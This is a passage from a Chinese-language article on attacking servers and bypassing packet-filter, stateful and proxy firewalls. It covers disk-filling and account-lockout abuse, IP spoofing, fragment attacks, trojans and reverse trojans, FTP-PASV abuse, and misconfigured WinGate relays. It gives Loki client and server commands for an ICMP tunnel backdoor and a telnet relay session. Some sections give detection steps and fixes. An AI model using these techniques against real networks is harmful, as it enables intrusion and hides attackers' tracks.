发送垃圾邮件。一般公司的服务器可能把邮件服务器和WEB服务器都放在一起。破坏者可以发送大量的垃圾邮件，这些邮件可能都塞在一个邮件队列中或者就是坏邮件队列中，直到邮箱被撑破或者把硬盘塞满。
让日志记录满。入侵者可以构造大量的错误信息发送出来，服务器记录这些错误，可能就造成日志文件非常庞大，甚至会塞满硬盘。同时会让管理员痛苦地面对大量的日志，甚至就不能发现入侵者真正的入侵途径。
向匿名FTP塞垃圾文件。这样也可以塞满硬盘空间。

6、合理利用策略
一般服务器都有关于帐户锁定的安全策略，比如，某个帐户连续3次登陆失败，那么这个帐号将被锁定。这点也可以被破坏者利用，他们伪装一个帐号去错误登陆，这样使得这个帐号被锁定，而正常的合法用户就不能使用这个帐号去登陆系统了

如何突破各种防火墙


现在随着人们的安全意识加强，防火墙一般都被公司企业采用来保障网络的安全，一般的攻击者在有防火墙的情况下，一般是很难入侵的。下面谈谈有防火墙环境下的攻击和检测。

　　一 防火墙基本原理

　　首先，我们需要了解一些基本的防火墙实现原理。防火墙目前主要分包过滤，和状态检测的包过滤，应用层代理防火墙。但是他们的基本实现都是类似的。

│ │---路由器-----网卡│防火墙│网卡│----------内部网络│ │

　　防火墙一般有两个以上的网络卡，一个连到外部（router)，另一个是连到内部网络。当打开主机网络转发功能时，两个网卡间的网络通讯能直接通过。当有防火墙时，他好比插在网卡之间，对所有的网络通讯进行控制。

　　说到访问控制，这是防火墙的核心了：），防火墙主要通过一个访问控制表来判断的，他的形式一般是一连串的如下规则：

　　1 accept from+ 源地址，端口 to+ 目的地址，端口+ 采取的动作

　　2 deny ...........（deny就是拒绝。。)

　　3 nat ............(nat是地址转换。后面说）

　　防火墙在网络层（包括以下的炼路层）接受到网络数据包后，就从上面的规则连表一条一条地匹配，如果符合就执行预先安排的动作了！如丢弃包。。。。

　　但是，不同的防火墙，在判断攻击行为时，有实现上的差别。下面结合实现原理说说可能的攻击。


　　二 攻击包过滤防火墙

　　包过滤防火墙是最简单的一种了，它在网络层截获网络数据包，根据防火墙的规则表，来检测攻击行为。他根据数据包的源IP地址；目的IP地址；TCP/UDP源端口；TCP/UDP目的端口来过滤！！很容易受到如下攻击：

　　1 ip 欺骗攻击：

　　这种攻击，主要是修改数据包的源，目的地址和端口，模仿一些合法的数据包来骗过防火墙的检测。如：外部攻击者，将他的数据报源地址改为内部网络地址，防火墙看到是合法地址就放行了：）。可是，如果防火墙能结合接口，地址来匹配，这种攻击就不能成功了：（

　　2 d.o.s拒绝服务攻击

　　简单的包过滤防火墙不能跟踪 tcp的状态，很容易受到拒绝服务攻击，一旦防火墙受到d.o.s攻击，他可能会忙于处理，而忘记了他自己的过滤功能。：）你就可以饶过了，不过这样攻击还很少的。！

　　3 分片攻击

　　这种攻击的原理是：在IP的分片包中，所有的分片包用一个分片偏移字段标志分片包的顺序，但是，只有第一个分片包含有TCP端口号的信息。当IP分片包通过分组过滤防火墙时，防火墙只根据第一个分片包的Tcp信息判断是否允许通过，而其他后续的分片不作防火墙检测，直接让它们通过。

　　这样，攻击者就可以通过先发送第一个合法的IP分片，骗过防火墙的检测，接着封装了恶意数据的后续分片包就可以直接穿透防火墙，直接到达内部网络主机，从而威胁网络和主机的安全。

　　4 木马攻击

　　对于包过滤防火墙最有效的攻击就是木马了，一但你在内部网络安装了木马，防火墙基本上是无能为力的。

　　原因是：包过滤防火墙一般只过滤低端口（1-1024），而高端口他不可能过滤的（因为，一些服务要用到高端口，因此防火墙不能关闭高端口的），所以很多的木马都在高端口打开等待，如冰河，subseven等。。。

　　但是木马攻击的前提是必须先上传，运行木马，对于简单的包过滤防火墙来说，是容易做的。这里不写这个了。大概就是利用内部网络主机开放的服务漏洞。
　　
　　早期的防火墙都是这种简单的包过滤型的，到现在已很少了，不过也有。现在的包过滤采用的是状态检测技术，下面谈谈状态检测的包过滤防火墙。

　　三 攻击状态检测的包过滤

　　状态检测技术最早是checkpoint提出的，在国内的许多防火墙都声称实现了状态检测技术。

　　可是：）很多是没有实现的。到底什么是状态检测？

　　一句话，状态检测就是从tcp连接的建立到终止都跟踪检测的技术。

　　原先的包过滤，是拿一个一个单独的数据包来匹配规则的。可是我们知道，同一个tcp连接，他的数据包是前后关联的，先是syn包，-》数据包=》fin包。数据包的前后序列号是相关的。
　
　　如果割裂这些关系，单独的过滤数据包，很容易被精心够造的攻击数据包欺骗！！！如nmap的攻击扫描，就有利用syn包，fin包，reset包来探测防火墙后面的网络。！

　　相反，一个完全的状态检测防火墙，他在发起连接就判断，如果符合规则，就在内存登记了这个连接的状态信息（地址，port，选项。。）,后续的属于同一个连接的数据包，就不需要在检测了。直接通过。而一些精心够造的攻击数据包由于没有在内存登记相应的状态信息，都被丢弃了。这样这些攻击数据包，就不能饶过防火墙了。

　　说状态检测必须提到动态规则技术。在状态检测里，采用动态规则技术，原先高端口的问题就可以解决了。实现原理是：平时，防火墙可以过滤内部网络的所有端口(1-65535),外部攻击者难于发现入侵的切入点，可是为了不影响正常的服务，防火墙一但检测到服务必须开放高端口时，如（ftp协议，irc等），防火墙在内存就可以动态地天加一条规则打开相关的高端口。等服务完成后，这条规则就又被防火墙删除。这样，既保障了安全，又不影响正常服务，速度也快。！

　　一般来说，完全实现了状态检测技术防火墙，智能性都比较高，一些扫描攻击还能自动的反应，因此，攻击者要很小心才不会被发现。

　　但是，也有不少的攻击手段对付这种防火墙的。

　　1 协议隧道攻击

　　协议隧道的攻击思想类似与***的实现原理，攻击者将一些恶意的攻击数据包隐藏在一些协议分组的头部，从而穿透防火墙系统对内部网络进行攻击。

　　例如，许多简单地允许ICMP回射请求、ICMP回射应答和UDP分组通过的防火墙就容易受到ICMP和UDP协议隧道的攻击。Loki和lokid（攻击的客户端和服务端）是实施这种攻击的有效的工具。在实际攻击中，攻击者首先必须设法在内部网络的一个系统上安装上lokid服务端，而后攻击者就可以通过loki客户端将希望远程执行的攻击命令（对应IP分组）嵌入在ICMP或UDP包头部，再发送给内部网络服务端lokid，由它执行其中的命令，并以同样的方式返回结果。由

　　于许多防火墙允许ICMP和UDP分组自由出入，因此攻击者的恶意数据就能附带在正常的分组，绕过防火墙的认证，顺利地到达攻击目标主机下面的命令是用于启动lokid服务器程序：

lokid-p–I–vl

loki客户程序则如下启动：

loki–d172.29.11.191(攻击目标主机)-p–I–v1–t3

　　这样，lokid和loki就联合提供了一个穿透防火墙系统访问目标系统的一个后门。

　　2 利用FTP-pasv绕过防火墙认证的攻击

　　FTP-pasv攻击是针对防火墙实施入侵的重要手段之一。目前很多防火墙不能过滤这种攻击手段。如CheckPoint的Firewall-1，在监视FTP服务器发送给客户端的包的过程中，它在每个包中寻找"227"这个字符串。如果发现这种包，将从中提取目标地址和端口，并对目标地址加以验证，通过后，将允许建立到该地址的TCP连接。

　　攻击者通过这个特性，可以设法连接受防火墙保护的服务器和服务。详细的描述可见：http://www.checkpoint.com/techsupport/alerts/pasvftp.html。

　　3 反弹木马攻击

　　反弹木马是对付这种防火墙的最有效的方法。攻击者在内部网络的反弹木马定时地连接外部攻击者控制的主机，由于连接是从内部发起的，防火墙（任何的防火墙）都认为是一个合法的连接，因此基本上防火墙的盲区就是这里了。防火墙不能区分木马的连接和合法的连接。

　　但是这种攻击的局限是：必须首先安装这个木马！！！所有的木马的第一步都是关键！！！

　　四 攻击代理

　　代理是运行在应用层的防火墙，他实质是启动两个连接，一个是客户到代理，另一个是代理到目的服务器。

　　实现上比较简单，和前面的一样也是根据规则过滤。由于运行在应用层速度比较慢/1

　　攻击代理的方法很多。

　　这里就以wingate为例，简单说说了。（太累了）

　　WinGate是目前应用非常广泛的一种Windows95/NT代理防火墙软件，内部用户可以通过一台安装有WinGate的主机访问外部网络，但是它也存在着几个安全脆弱点。

　　黑客经常利用这些安全漏洞获得WinGate的非授权Web、Socks和Telnet的访问，从而伪装成WinGate主机的身份对下一个攻击目标发动攻击。因此，这种攻击非常难于被跟踪和记录。
　　
　　导致WinGate安全漏洞的原因大多数是管理员没有根据网络的实际情况对WinGate代理防火墙软件进行合理的设置，只是简单地从缺省设置安装完毕后就让软件运行，这就给攻击者可乘之机。

　　1 非授权Web访问

　　某些WinGate版本（如运行在NT系统下的2.1d版本）在误配置情况下，允许外部主机完全匿名地访问因特网。因此，外部攻击者就可以利用WinGate主机来对Web服务器发动各种Web攻击（ 如CGI的漏洞攻击等），同时由于Web攻击的所有报文都是从80号Tcp端口穿过的，因此，很难追踪到攻击者的来源。

　　检测

　　检测WinGate主机是否有这种安全漏洞的方法如下：

　　1) 以一个不会被过滤掉的连接（譬如说拨号连接）连接到因特网上。

　　2) 把浏览器的代理服务器地址指向待测试的WinGate主机。

　　如果浏览器能访问到因特网，则WinGate主机存在着非授权Web访问漏洞。


　　2 非授权Socks访问

　　在WinGate的缺省配置中，Socks代理（1080号Tcp端口）同样是存在安全漏洞。与打开的Web代理（80号Tcp端口）一样，外部攻击者可以利用Socks代理访问因特网。


　　防范

　　要防止攻击WinGate的这个安全脆弱点，管理员可以限制特定服务的捆绑。在多宿主（multi homed）系统上，执行以下步骤以限定如何提供代理服务。

　　1选择Socks或WWWProxyServer属性。

　　2选择Bindings标签。

　　3按下ConnectiollBeAcceptedOnTheFollowingInterfaceOnly按钮，并指定本WinGate服务器的内部接口。

　　非授权Telnet访问

　　它是WinGate最具威胁的安全漏洞。通过连接到一个误配置的WinGate服务器的Telnet服务，攻击者可以使用别人的主机隐藏自己的踪迹，随意地发动攻击。

　　检测

　　检测WinGate主机是否有这种安全漏洞的方法如下：

　　1.使用telnet尝试连接到一台WinGate服务器。

[root@happy/tmp]#telnet172.29.11.191

Trying172.29.11.191….

Connectedto172.29.11.191.

Escapecharacteris‘^]’.

Wingate>10.50.21.5


　　2.如果接受到如上的响应文本，那就输入待连接到的网站。


　　3.如果看到了该新系统的登录提示符，那么该服务器是脆弱的。

Connectedtohost10.50.21.5…Connected

SunOS5.6

Login:

　　对策

　　防止这种安全脆弱点的方法和防止非授权Socks访问的方法类似。在WinGate中简单地限制特定服务的捆绑就可以解决这个问题。一般来说，在多宿主（multihomed）系统管理员可以通过执行以下步骤来完成：

　　1.选择TelnetSever属性。

　　2.选择Bindings标签。

　　3.按下ConnectiollBeAcceptedOnTheFollowingInterfaceOnly按钮，并指定本WinGate服务器的内部接口。


　　五 后话

　　有防火墙的攻击不单是上面的一点，我有什么写的不对的，大家指正。

　　一直以来，黑客都在研究攻击防火墙的技术和手段，攻击的手法和技术越来越智能化和多样化。但是就黑客攻击防火墙的过程上看，大概可以分为三类攻击。

　　第一类攻击防火墙的方法是探测在目标网络上安装的是何种防火墙系统并且找出此防火墙系统允许哪些服务。我们叫它为对防火墙的探测攻击。

　　第二类攻击防火墙的方法是采取地址欺骗、TCP序号攻击等手法绕过防火墙的认证机制，从而 对防火墙和内部网络破坏。

　　第三类攻击防火墙的方法是寻找、利用防火墙系统实现和设计上的安全漏洞，从而有针对性地发动攻击。这种攻击难度比较大，可是破坏性很大